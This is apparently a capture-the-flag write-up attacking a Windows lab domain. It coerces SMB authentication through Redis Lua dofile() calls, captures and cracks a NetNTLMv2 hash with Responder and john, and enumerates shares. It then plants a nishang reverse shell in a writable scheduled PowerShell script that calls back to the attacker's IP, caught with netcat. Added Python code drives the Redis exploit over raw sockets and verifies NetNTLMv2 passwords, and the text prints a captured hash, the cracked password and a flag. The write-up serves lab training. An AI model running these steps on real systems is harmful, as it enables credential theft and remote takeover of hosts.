Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [OFF]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.9.191.227]
Responder IPv6 [fe80::7589:1b62:606e:6c09]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
[+] Current Session Variables:
Responder Machine Name [WIN-ALXRPOCIKFA]
Responder Domain Name [XKFP.LOCAL]
Responder DCE-RPC Port [48193]
[+] Listening for events...
redis exploitation
EVAL runs Lua inside redis-server. dofile() loads the named file as Lua source, so a non-Lua file fails to parse, but the parser error quotes the offending token back to the client, which turns it into a crude file-read oracle. Two limitations show below: only the first token the lexer rejects comes back, and Lua's loader skips a first line beginning with '#' (shebang handling), which is why the hosts file error points at line 2. user.txt leaks in full because its content starts with a digit and the lexer swallows the whole alphanumeric run as a malformed number.
10.10.22.71:6379> EVAL "dofile('C:/Windows/System32/drivers/etc/Hosts')" 0
(error) ERR Error running script (call to f_df72500a0c02a7d5e1d237a6ec4408ed87f17e68): @user_script:1: C:/Windows/System32/drivers/etc/Hosts:2: unexpected symbol near '#'
(0.78s)
10.10.22.71:6379> EVAL "dofile('C:/Users/enterprise-security/Desktop/user.txt')" 0
(error) ERR Error running script (call to f_eebcad8707d6acaa5a1f5511b5d88676a90438d6): @user_script:1: C:/Users/enterprise-security/Desktop/user.txt:1: malformed number near '3eb176aee96432d5b100bc93580b291e'
smb credentials capturing
Pointing dofile() at a UNC path on the attacker's host makes the Redis process open \\10.9.191.227\test over SMB. Windows authenticates that connection with the account running redis-server, so Responder's SMB listener records a NetNTLMv2 challenge/response for VULNNET\enterprise-security. The Lua error ('Permission denied') is expected: the authentication exchange has already completed by the time Responder refuses the share. Because the DC requires SMB signing, relaying this authentication back to it is not an option; crack it offline instead.
Received in redis
EVAL "dofile('//10.9.191.227/test')" 0
(error) ERR Error running script (call to f_22a952acc4988c1dd72b11707328075e3b1081bb): @user_script:1: cannot open //10.9.191.227/test: Permission denied
(0.73s)
Received in responder
[SMB] NTLMv2-SSP Client : 10.10.22.71
[SMB] NTLMv2-SSP Username : VULNNET\enterprise-security
[SMB] NTLMv2-SSP Hash : enterprise-security::VULNNET:1473b00d7631333a:111056E8FE5BFAE1DCEF849049C9AF7D:010100000000000000E628B7085ADA0148B5D55E4184EB84000000000200080058004B004600500001001E00570049004E002D0041004C005800520050004F00430049004B004600410004003400570049004E002D0041004C005800520050004F00430049004B00460041002E0058004B00460050002E004C004F00430041004C000300140058004B00460050002E004C004F00430041004C000500140058004B00460050002E004C004F00430041004C000700080000E628B7085ADA0106000400020000000800300030000000000000000000000000300000F38E6A2EDF011A9161B20091903EF59B7CB500F18D10214C57092838A35E05390A001000000000000000000000000000000000000900220063006900660073002F00310030002E0039002E003100390031002E003200320037000000000000000000
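The two Redis steps above (the dofile() parse-error leak and the UNC-path coercion) can be driven without redis-cli. The following is an added example, not code from the writeup: it encodes the EVAL command as raw RESP over a socket and pulls the leaked token out of the Lua parser error. The three SAMPLE_* strings are copied from the redis-cli output above so the parser can be exercised offline; leak_via_dofile() needs a live Redis host and was not run against one here.

```python
"""Drive Redis EVAL "dofile('<path>')" 0 over raw RESP and parse the Lua error.

Added example, not part of the original writeup.  Standard library only.
"""
import re
import socket
from typing import Optional, Tuple

# Lua loader errors look like: "@user_script:1: <path>:<line>: <reason> near '<token>'".
# A UNC path that reaches the attacker's SMB listener instead yields
# "cannot open //host/share: Permission denied", which has no token to parse.
LUA_ERR = re.compile(
    r"@user_script:\d+: (?P<path>.+):(?P<line>\d+): (?P<reason>[^']+?) near '(?P<token>[^']*)'$"
)

# Error strings copied from the writeup's redis-cli session (used as test input).
SAMPLE_HOSTS_ERR = ("ERR Error running script (call to f_df72500a0c02a7d5e1d237a6ec4408ed87f17e68): "
                    "@user_script:1: C:/Windows/System32/drivers/etc/Hosts:2: unexpected symbol near '#'")
SAMPLE_USERTXT_ERR = ("ERR Error running script (call to f_eebcad8707d6acaa5a1f5511b5d88676a90438d6): "
                      "@user_script:1: C:/Users/enterprise-security/Desktop/user.txt:1: "
                      "malformed number near '3eb176aee96432d5b100bc93580b291e'")
SAMPLE_UNC_ERR = ("ERR Error running script (call to f_22a952acc4988c1dd72b11707328075e3b1081bb): "
                  "@user_script:1: cannot open //10.9.191.227/test: Permission denied")


def resp_command(*args: str) -> bytes:
    """Encode a command as a RESP multi-bulk array, exactly as redis-cli sends it."""
    parts = [b"*%d\r\n" % len(args)]
    for arg in args:
        raw = arg.encode()
        parts.append(b"$%d\r\n%s\r\n" % (len(raw), raw))
    return b"".join(parts)


def dofile_script(path: str) -> str:
    """Build the Lua payload. Forward slashes sidestep Lua escape handling of backslashes;
    a UNC path such as //10.9.191.227/test triggers the SMB coercion instead of a read."""
    clean = path.replace("\\", "/")
    if "'" in clean:
        raise ValueError("path must not contain a single quote")
    return f"dofile('{clean}')"


def parse_dofile_error(reply: str) -> Optional[dict]:
    """Return the leaked token (plus line and reason) from a Lua parse error, or None
    when the error was not a parse error (file unreadable, UNC coercion, etc.)."""
    m = LUA_ERR.search(reply)
    if not m:
        return None
    return {"path": m["path"], "line": int(m["line"]), "reason": m["reason"], "token": m["token"]}


def leak_via_dofile(host: str, path: str, port: int = 6379, timeout: float = 5.0) -> Tuple[str, Optional[dict]]:
    """Send the payload to an unauthenticated Redis and return (raw reply, parsed leak)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(resp_command("EVAL", dofile_script(path), "0"))
        # Error replies are a single "-ERR ..." line terminated by CRLF.
        reply = sock.makefile("rb").readline().decode(errors="replace").rstrip("\r\n").lstrip("-")
    return reply, parse_dofile_error(reply)


if __name__ == "__main__":
    for sample in (SAMPLE_HOSTS_ERR, SAMPLE_USERTXT_ERR, SAMPLE_UNC_ERR):
        print(parse_dofile_error(sample))
```

The oracle only ever returns the first token the lexer rejects, so it is useful for single-token files such as flags or keys; for anything longer the UNC coercion plus offline cracking, as in the next section, is the better channel.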
hashcracking
haiti 'enterprise-security::VULNNET:1473b00d7631333a:111056E8FE5BFAE1DCEF849049C9AF7D:010100000000000000E628B7085ADA0148B5D55E4184EB84000000000200080058004B004600500001001E00570049004E002D0041004C005800520050004F00430049004B004600410004003400570049004E002D0041004C005800520050004F00430049004B00460041002E0058004B00460050002E004C004F00430041004C000300140058004B00460050002E004C004F00430041004C000500140058004B00460050002E004C004F00430041004C000700080000E628B7085ADA0106000400020000000800300030000000000000000000000000300000F38E6A2EDF011A9161B20091903EF59B7CB500F18D10214C57092838A35E05390A001000000000000000000000000000000000000900220063006900660073002F00310030002E0039002E003100390031002E003200320037000000000000000000'
NetNTLMv2 (vanilla) [HC: 5600] [JtR: netntlmv2]
NetNTLMv2 (NT) [HC: 27100] [JtR: netntlmv2]
john --format=netntlmv2 -w=/usr/share/wordlists/rockyou.txt /home/kali/thm/vulnnetactive/hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sand_0873959498 (enterprise-security)
1g 0:00:00:01 DONE (2024-02-07 21:14) 0.5434g/s 2181Kp/s 2181Kc/s 2181KC/s sandoval69..sand36
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
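John reports the password, but it pays to understand what it actually checked. The following added example (not code from the writeup, standard library only) re-implements the NetNTLMv2 verification that john and hashcat perform and runs it against the hash Responder captured above: NT hash = MD4(UTF-16LE password), NTOWFv2 = HMAC-MD5(NT hash, UPPER(user) + domain), and the captured NTProofStr must equal HMAC-MD5(NTOWFv2, server challenge || blob). MD4 is written out by hand because hashlib's 'md4' is frequently unavailable under OpenSSL 3. CAPTURED is the hash string from the haiti command; the known-answer values used in testing (MD4 of the empty string and of "abc", the NT hash of "password") are the standard published vectors.

```python
"""Offline NetNTLMv2 check: does a candidate password reproduce the captured NTProofStr?

Added example, not part of the original writeup.
"""
import hashlib
import hmac
import struct


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320, returned as 16 raw bytes."""
    mask = 0xFFFFFFFF
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & mask
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    # Padding: 0x80, zeros up to 56 mod 64, then the bit length as 64-bit little-endian.
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    r3_order = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):  # round 1: F, message words in order
            a, b, c, d = d, rotl((a + f(b, c, d) + x[i]) & mask, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):  # round 2: G, words 0,4,8,12,1,5,...
            k = (i % 4) * 4 + i // 4
            a, b, c, d = d, rotl((a + g(b, c, d) + x[k] + 0x5A827999) & mask, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):  # round 3: H, words 0,8,4,12,2,10,...
            a, b, c, d = d, rotl((a + h(b, c, d) + x[r3_order[i]] + 0x6ED9EBA1) & mask, (3, 9, 11, 15)[i % 4]), b, c
        a0, b0, c0, d0 = (a0 + a) & mask, (b0 + b) & mask, (c0 + c) & mask, (d0 + d) & mask
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> bytes:
    """NTOWFv1: MD4 of the UTF-16LE encoded password (no BOM)."""
    return md4(password.encode("utf-16le"))


def ntlmv2_key(password: str, user: str, domain: str) -> bytes:
    """NTOWFv2 (MS-NLMP 3.3.2): HMAC-MD5(NT hash, UPPER(user) + domain), UTF-16LE.
    The user name is upper-cased; the domain is used exactly as the client sent it."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()


def parse_responder_line(line: str):
    """Responder / hashcat 5600 layout: user::domain:server_challenge:NTProofStr:blob"""
    parts = line.strip().split(":")
    if len(parts) != 6:
        raise ValueError("not a NetNTLMv2 line")
    user, _, domain, challenge, proof, blob = parts
    return user, domain, bytes.fromhex(challenge), bytes.fromhex(proof), bytes.fromhex(blob)


def verify_netntlmv2(captured: str, password: str) -> bool:
    """True when NTProofStr == HMAC-MD5(NTOWFv2, server_challenge || blob)."""
    user, domain, challenge, proof, blob = parse_responder_line(captured)
    candidate = hmac.new(ntlmv2_key(password, user, domain), challenge + blob, hashlib.md5).digest()
    return hmac.compare_digest(candidate, proof)


# The hash Responder captured in this writeup (same string passed to haiti above).
CAPTURED = "enterprise-security::VULNNET:1473b00d7631333a:111056E8FE5BFAE1DCEF849049C9AF7D:010100000000000000E628B7085ADA0148B5D55E4184EB84000000000200080058004B004600500001001E00570049004E002D0041004C005800520050004F00430049004B004600410004003400570049004E002D0041004C005800520050004F00430049004B00460041002E0058004B00460050002E004C004F00430041004C000300140058004B00460050002E004C004F00430041004C000500140058004B00460050002E004C004F00430041004C000700080000E628B7085ADA0106000400020000000800300030000000000000000000000000300000F38E6A2EDF011A9161B20091903EF59B7CB500F18D10214C57092838A35E05390A001000000000000000000000000000000000000900220063006900660073002F00310030002E0039002E003100390031002E003200320037000000000000000000"


if __name__ == "__main__":
    for guess in ("Password123", "sand_0873959498"):
        print(f"{guess:>16}: {'match' if verify_netntlmv2(CAPTURED, guess) else 'no match'}")
```

The blob carries Responder's own machine name, domain (XKFP.LOCAL) and the cifs/10.9.191.227 target name in its AV pairs, which is why a NetNTLMv2 response is bound to the one challenge it was computed for and cannot be replayed elsewhere; only the password (through the NT hash) is reusable, which is what the rest of the writeup does with it.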
smb enumeration (authenticated)
With the cracked password the domain shares can be listed. The target IP differs from here on (10.10.141.42, later 10.10.4.22) because the lab instance was restarted between sessions; it is the same host, VULNNET-BC3TCK1.
smbclient
smbclient -U enterprise-security -L //10.10.141.42
Password for [WORKGROUP\enterprise-security]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Enterprise-Share Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
tstream_smbXcli_np_destructor: cli_close failed on pipe srvsvc. Error was NT_STATUS_IO_TIMEOUT
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.141.42 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
smbmap
smbmap -u enterprise-security -p sand_0873959498 -H 10.10.141.42 --no-banner
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[+] IP: 10.10.141.42:445 Name: 10.10.141.42 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
Enterprise-Share READ, WRITE
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
nullinux https://github.com/m8sec/nullinux
nullinux -shares -u enterprise-security -p sand_0873959498 10.10.141.42
Starting nullinux v5.5.0dev | 02-07-2024 21:45
[*] Enumerating Shares for: 10.10.141.42
Shares Comments
-------------------------------------------
\\10.10.141.42\ADMIN$ Remote Admin
\\10.10.141.42\C$ Default share
\\10.10.141.42\Enterprise-Share
\\10.10.141.42\IPC$
\\10.10.141.42\NETLOGON Logon server share
\\10.10.141.42\SYSVOL Logon server share
[*] Enumerating: \\10.10.141.42\Enterprise-Share
. D 0 Wed Feb 7 21:43:27 2024
.. D 0 Wed Feb 7 21:43:27 2024
PurgeIrrelevantData_1826.ps1 A 69 Tue Feb 23 19:33:18 2021
[*] Enumerating: \\10.10.141.42\NETLOGON
. D 0 Tue Feb 23 04:29:58 2021
.. D 0 Tue Feb 23 04:29:58 2021
[*] Enumerating: \\10.10.141.42\SYSVOL
. D 0 Tue Feb 23 04:29:58 2021
.. D 0 Tue Feb 23 04:29:58 2021
vulnnet.local Dr 0 Tue Feb 23 04:29:58 2021
[*] 0 unique user(s) identified
smbclient
smbclient -I 10.10.141.42 -U 'enterprise-security' --password sand_0873959498 --client-protection sign '\\10.10.141.42\Enterprise-Share\'
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Feb 7 21:43:27 2024
.. D 0 Wed Feb 7 21:43:27 2024
PurgeIrrelevantData_1826.ps1 A 69 Tue Feb 23 19:33:18 2021
9558271 blocks of size 4096. 5160889 blocks available
smb: \> get PurgeIrrelevantData_1826.ps1
getting file \PurgeIrrelevantData_1826.ps1 of size 69 as PurgeIrrelevantData_1826.ps1 (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
cat PurgeIrrelevantData_1826.ps1
rm -Force C:\Users\Public\Documents\* -ErrorAction SilentlyContinue
The script is a one-line cleanup job sitting in a share that enterprise-security can write to. A writable script whose name and content suggest it runs on a schedule is the lead to follow next: whichever account executes it determines what replacing its contents is worth. Confirm write access first by uploading a harmless file with smbclient's put, since the tools disagree on the share's permissions (smbmap reports READ, WRITE; crackmapexec below reports READ).
crackmapexec
crackmapexec smb 10.10.4.22 -u 'enterprise-security' -p 'sand_0873959498' --shares
SMB 10.10.4.22 445 VULNNET-BC3TCK1 [*] Windows 10.0 Build 17763 x64 (name:VULNNET-BC3TCK1) (domain:vulnnet.local) (signing:True) (SMBv1:False)
SMB 10.10.4.22 445 VULNNET-BC3TCK1 [+] vulnnet.local\enterprise-security:sand_0873959498
SMB 10.10.4.22 445 VULNNET-BC3TCK1 [+] Enumerated shares
SMB 10.10.4.22 445 VULNNET-BC3TCK1 Share Permissions Remark
SMB 10.10.4.22 445 VULNNET-BC3TCK1 ----- ----------- ------
SMB 10.10.4.22 445 VULNNET-BC3TCK1 ADMIN$ Remote Admin
SMB 10.10.4.22 445 VULNNET-BC3TCK1 C$ Default share
SMB 10.10.4.22 445 VULNNET-BC3TCK1 Enterprise-Share READ
SMB 10.10.4.22 445 VULNNET-BC3TCK1 IPC$ READ Remote IPC
SMB 10.10.4.22 445 VULNNET-BC3TCK1 NETLOGON READ Logon server share
SMB 10.10.4.22 445 VULNNET-BC3TCK1 SYSVOL READ Logon server share
------------------
crackmapexec smb 10.10.4.22 -u 'enterprise-security' -p 'sand_0873959498' -M spider_plus
SMB 10.10.4.22 445 VULNNET-BC3TCK1 [*] Windows 10.0 Build 17763 x64 (name:VULNNET-BC3TCK1) (domain:vulnnet.local) (signing:True) (SMBv1:False)
SMB 10.10.4.22 445 VULNNET-BC3TCK1 [+] vulnnet.local\enterprise-security:sand_0873959498
SPIDER_P... 10.10.4.22 445 VULNNET-BC3TCK1 [*] Started spidering plus with option:
SPIDER_P... 10.10.4.22 445 VULNNET-BC3TCK1 [*] DIR: ['print$']
SPIDER_P... 10.10.4.22 445 VULNNET-BC3TCK1 [*] EXT: ['ico', 'lnk']
SPIDER_P... 10.10.4.22 445 VULNNET-BC3TCK1 [*] SIZE: 51200
SPIDER_P... 10.10.4.22 445 VULNNET-BC3TCK1 [*] OUTPUT: /tmp/cme_spider_plus
------------------
cat /tmp/cme_spider_plus/10.10.4.22.json
{
"Enterprise-Share": {
"PurgeIrrelevantData_1826.ps1": {
"atime_epoch": "2021-02-23 19:33:18",
"ctime_epoch": "2021-02-23 17:45:41",
"mtime_epoch": "2021-02-23 19:33:18",
"size": "69 Bytes"
}
},
"IPC$": {
"Ctx_WinStation_API_service": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "3 Bytes"
},
"InitShutdown": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "3 Bytes"
},
"LSM_API_service": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "3 Bytes"
},
"PIPE_EVENTROOT\\CIMV2SCM EVENT PROVIDER": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "1 Bytes"
},
"PSHost.133518828072297203.2852.DefaultAppDomain.powershell": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "1 Bytes"
},
"PSHost.133518828426402395.3444.DefaultAppDomain.powershell": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "1 Bytes"
},
"RpcProxy\\49669": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "3 Bytes"
},
"RpcProxy\\593": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "3 Bytes"
},
"SessEnvPublicRpc": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "3 Bytes"
},
"TermSrv_API_service": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "3 Bytes"
},
"W32TIME_ALT": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "3 Bytes"
},
"Winsock2\\CatalogChangeListener-2a8-0": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "1 Bytes"
},
"Winsock2\\CatalogChangeListener-2f8-0": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "1 Bytes"
},
"Winsock2\\CatalogChangeListener-304-0": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "1 Bytes"
},
"Winsock2\\CatalogChangeListener-304-1": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "1 Bytes"
},
"Winsock2\\CatalogChangeListener-380-0": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "1 Bytes"
},
"Winsock2\\CatalogChangeListener-3dc-0": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "1 Bytes"
},
"Winsock2\\CatalogChangeListener-424-0": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "1 Bytes"
},
"Winsock2\\CatalogChangeListener-8b0-0": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "1 Bytes"
},
"Winsock2\\CatalogChangeListener-914-0": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "1 Bytes"
},
"Winsock2\\CatalogChangeListener-938-0": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "1 Bytes"
},
"atsvc": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "3 Bytes"
},
"c15a459688cdcf5a": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "3 Bytes"
},
"epmapper": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "3 Bytes"
},
"eventlog": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "3 Bytes"
},
"lsass": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "9 Bytes"
},
"netdfs": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "3 Bytes"
},
"ntsvcs": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "3 Bytes"
},
"scerpc": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "3 Bytes"
},
"spoolss": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "3 Bytes"
},
"srvsvc": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "5 Bytes"
},
"winreg": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "3 Bytes"
},
"wkssvc": {
"atime_epoch": "1600-12-31 19:03:58",
"ctime_epoch": "1600-12-31 19:03:58",
"mtime_epoch": "1600-12-31 19:03:58",
"size": "6 Bytes"
}
},
"NETLOGON": {},
"SYSVOL": {
"vulnnet.local/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI": {
"atime_epoch": "2021-02-23 04:36:27",
"ctime_epoch": "2021-02-23 04:30:36",
"mtime_epoch": "2021-02-23 18:08:53",
"size": "22 Bytes"
},
"vulnnet.local/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
"atime_epoch": "2021-02-23 04:30:36",
"ctime_epoch": "2021-02-23 04:30:36",
"mtime_epoch": "2021-02-23 18:08:53",
"size": "1.07 KB"
},
"vulnnet.local/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol": {
"atime_epoch": "2021-02-23 04:36:27",
"ctime_epoch": "2021-02-23 04:36:27",
"mtime_epoch": "2021-02-23 18:08:53",
"size": "2.72 KB"
},
"vulnnet.local/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI": {
"atime_epoch": "2021-02-23 19:14:52",
"ctime_epoch": "2021-02-23 04:30:36",
"mtime_epoch": "2021-02-23 19:14:52",
"size": "22 Bytes"
},
"vulnnet.local/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
"atime_epoch": "2021-02-23 17:00:15",
"ctime_epoch": "2021-02-23 04:30:36",
"mtime_epoch": "2021-02-23 18:09:46",
"size": "3.75 KB"
},
"vulnnet.local/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Registry.pol": {
"atime_epoch": "2021-02-23 19:14:52",
"ctime_epoch": "2021-02-23 19:14:52",
"mtime_epoch": "2021-02-23 19:14:52",
"size": "160 Bytes"
},
"vulnnet.local/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/comment.cmtx": {
"atime_epoch": "2021-02-23 19:14:52",
"ctime_epoch": "2021-02-23 19:14:52",
"mtime_epoch": "2021-02-23 19:14:52",
"size": "554 Bytes"
}
}
}
shell access
Given the name of the "PurgeIrrelevantData_1826.ps1" file and the fact that we have READ/WRITE access to the share, that file may be run by a scheduled task.
Download https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1
Add "Invoke-PowerShellTcp -Reverse -IPAddress 10.9.191.227 -Port 4321" at the end of the script.
Upload it with the name "PurgeIrrelevantData_1826.ps1".
smbclient -I 10.10.69.113 -U 'enterprise-security' --password sand_0873959498 --client-protection sign '\\10.10.69.113\Enterprise-Share\'
Try "help" to get a list of possible commands.
smb: \> put PurgeIrrelevantData_1826.ps1
putting file PurgeIrrelevantData_1826.ps1 as \PurgeIrrelevantData_1826.ps1 (3.8 kb/s) (average 1.8 kb/s)
smb: \> exit
------------
Get reverse shell
rlwrap nc -lnvp 4321
listening on [any] 4321 ...
ls
connect to [10.9.191.227] from (UNKNOWN) [10.10.69.113] 49909
Windows PowerShell running as user enterprise-security on VULNNET-BC3TCK1
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Users\enterprise-security\Downloads>
Directory: C:\Users\enterprise-security\Downloads
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/23/2021 2:29 PM nssm-2.24-101-g897c7ad
d----- 2/26/2021 12:14 PM Redis-x64-2.8.2402
-a---- 2/26/2021 10:37 AM 143 startup.bat
PS C:\Users\enterprise-security\Downloads> whoami
vulnnet\enterprise-security
PS C:\Users\enterprise-security\Downloads> whoami /all
USER INFORMATION
----------------
User Name SID
=========================== ============================================
vulnnet\enterprise-security S-1-5-21-1405206085-1650434706-76331420-1103
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
